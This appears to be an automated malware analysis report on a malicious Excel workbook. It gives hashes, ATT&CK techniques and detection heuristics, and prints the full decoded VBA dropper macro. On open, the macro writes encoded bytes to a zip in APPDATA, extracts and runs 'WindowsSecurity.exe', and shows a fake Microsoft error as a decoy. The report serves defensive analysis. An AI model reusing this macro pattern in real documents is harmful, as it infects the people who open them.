Malicious Office (OLE) / .XLSX — malware analysis report

Static analysis result for SHA-256 bd5cca30a4940bb5…

MALICIOUS

Office (OLE) / .XLSX

1.36 MB Created: 2020-02-07 11:26:50 Authoring application: Microsoft Excel First seen: 2022-08-05
MD5: 7db9a21aba18e410dec328b8a09ce407 SHA-1: 8790339cf9f4d3d132b777e1469fc8b3148f727c SHA-256: bd5cca30a4940bb504385f6edc40fd6824c6aa996887094cbc977dbbc675c3ea
176 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1140 Deobfuscate or Obfuscate Malicious Code

The sample contains VBA macros that execute upon opening the workbook, as indicated by the Workbook_Open and OLE_VBA_WBOPEN heuristics. The script constructs a path to %APPDATA%\WindowsSecurity.zip, writes obfuscated byte data to this file, and then uses Shell.Application to extract and execute a file named WindowsSecurity.exe from the zip archive. This behavior strongly suggests a downloader or dropper functionality.

Heuristics 6

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell folder_name & file_name & ".e" & "xe", vbNormalNoFocus
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set oApp = CreateObject("Shell.Application")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
     Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    folder_name = Environ$("APPDATA") & "\"

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2911 bytes
SHA-256: fd33eb39e6cdaba21e08b3cb7ad42f38c7e0fe913ced164adb5f34a8d1465bb7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
 Sub Workbook_Open()

hola
End Sub

 Sub unzipper(zFname As Variant, eFname As Variant)
    Dim FSO As Object
    
    Dim oApp As Object
     
    Set oApp = CreateObject("Shell.Application")
    
    oApp.Namespace(eFname).CopyHere oApp.Namespace(zFname).items
    
   
End Sub


Sub hola()

Dim path_file As String

Dim file_name As String

Dim folder_name As Variant

Dim byt() As Byte

Dim ar1Gohra() As String


file_name = "WindowsSecurity"

folder_name = Environ$("APPDATA") & "\"

If Dir(folder_name, vbDirectory) = "" Then
MkDir (folder_name)
End If


path_file = folder_name & file_name

Dim linGohra As Double

linGohra = 0
Dim liar As Integer

liar = 0

Dim btsGohra7(361128) As Byte
ar1Gohra = Split(UserForm1.TextBox1.Text, "-")

For Each vl In ar1Gohra
btsGohra7(linGohra) = CByte(vl)
linGohra = linGohra + 1
Next


Open path_file & ".zip" For Binary Access Write As #3
Put #3, , btsGohra7
Close #3




If Dir(folder_name & file_name & ".e" & "xe") = "" Then
unzipper folder_name & file_name & ".zip", folder_name
End If

 Dim a As String
a = MsgBox("Microsoft Office Excel: This Version isn't Compatible with This file.", vbCritical, "Microsoft Error")


Shell folder_name & file_name & ".e" & "xe", vbNormalNoFocus


End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{1431F97C-471B-4F10-9B03-8ECA78809132}{33DA1254-85A2-467D-A205-17541BE63550}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub
ole10native_00.bin ole-package OLE Ole10Native stream: MBD010F1B0C/Ole10Native 71968 bytes
SHA-256: 361f1ff9aa84c59fa8f8a14f734d7b2bc602ae6f126bd5284d0672dda7be072a

Open this report in the interactive analyzer, or submit your own file for analysis.